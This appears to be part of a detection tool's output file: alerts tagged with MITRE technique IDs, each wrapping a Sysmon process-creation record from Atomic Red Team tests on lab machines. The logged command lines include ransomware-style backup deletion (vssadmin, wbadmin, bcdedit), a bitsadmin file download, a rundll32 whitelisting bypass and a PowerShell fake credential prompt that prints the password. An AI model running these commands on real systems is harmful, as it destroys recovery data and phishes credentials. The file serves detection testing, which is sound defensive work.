+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D4B8-5D31-0000-0010A8CE0600
+ 4416
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547710.660877,2019-07-19T18:48:30.660877+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3657
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:30.619
+ 747F3D96-D83E-5D31-0000-0010F0D02E00
+ 752
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966541
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 21:22:28.806
+ 365ABB72-5D94-5C91-0000-001080E90F00
+ 3840
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb
+ C:\Windows\AppPatch\Custom\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-543D-5C91-0000-001099A60300
+ 2984
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966541
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 21:22:28.806
+ 365ABB72-5D94-5C91-0000-001080E90F00
+ 3840
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb
+ C:\Windows\AppPatch\Custom\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-543D-5C91-0000-001099A60300
+ 2984
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547710.640915,2019-07-19T18:48:30.640915+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3656
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:05.349
+ 747F3D96-D825-5D31-0000-0010CF222C00
+ 5808
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966541
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 21:22:28.806
+ 365ABB72-5D94-5C91-0000-001080E90F00
+ 3840
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb
+ C:\Windows\AppPatch\Custom\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-543D-5C91-0000-001099A60300
+ 2984
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547684.13141,2019-07-19T18:48:04.131410+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3654
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:04.094
+ 747F3D96-D824-5D31-0000-001023F42B00
+ 6736
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547684.103366,2019-07-19T18:48:04.103366+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3653
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:57.265
+ 747F3D96-D81D-5D31-0000-0010D7CD2B00
+ 7080
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547677.274199,2019-07-19T18:47:57.274199+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3652
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:57.189
+ 747F3D96-D81D-5D31-0000-0010B8CA2B00
+ 1632
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547677.227966,2019-07-19T18:47:57.227966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3651
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:51.972
+ 747F3D96-D817-5D31-0000-0010C8BA2B00
+ 7040
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547672.010791,2019-07-19T18:47:52.010791+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3649
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:51.899
+ 747F3D96-D817-5D31-0000-001049B42B00
+ 6216
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547671.865963,2019-07-19T18:47:51.865963+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3647
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:51.784
+ 747F3D96-D817-5D31-0000-001064AD2B00
+ 6508
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547666.302556,2019-07-19T18:47:46.302556+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3645
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:46.104
+ 747F3D96-D812-5D31-0000-0010AC892B00
+ 2948
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553037538.288766,2019-03-20T03:18:58.288766+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966704
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 23:18:42.516
+ 365ABB72-78D2-5C91-0000-0010D8A50200
+ 2572
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /c msg * "hello from run key"
+ C:\Windows\system32\
+ EXAMPLE\user01
+ 365ABB72-77C4-5C91-0000-0020AD7D0100
+ 0x17dad
+ 1
+ High
+ MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-785E-5C91-0000-00103FEA0100
+ 1928
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547665.624944,2019-07-19T18:47:45.624944+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3641
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:45.569
+ 747F3D96-D811-5D31-0000-001000632B00
+ 4500
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547665.585327,2019-07-19T18:47:45.585327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3640
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:40.849
+ 747F3D96-D80C-5D31-0000-001005542B00
+ 1348
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547660.70604,2019-07-19T18:47:40.706040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3638
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:40.568
+ 747F3D96-D80C-5D31-0000-0010223C2B00
+ 6896
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547660.691438,2019-07-19T18:47:40.691438+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3637
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:37.170
+ 747F3D96-D809-5D31-0000-001072292B00
+ 980
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547657.127263,2019-07-19T18:47:37.127263+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3633
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:47:37.083
+ 747F3D96-D809-5D31-0000-00100A242B00
+ 3968
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,PromptForCredential,powershell,PromptForCredential) in event with Command Line (powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}") in directory : ( C:\AtomicRedTeam\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3631
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:46:51.935
+ 747F3D96-D7DB-5D31-0000-0010B5A82A00
+ 4452
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-D7DB-5D31-0000-001089A52A00
+ 4256
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"
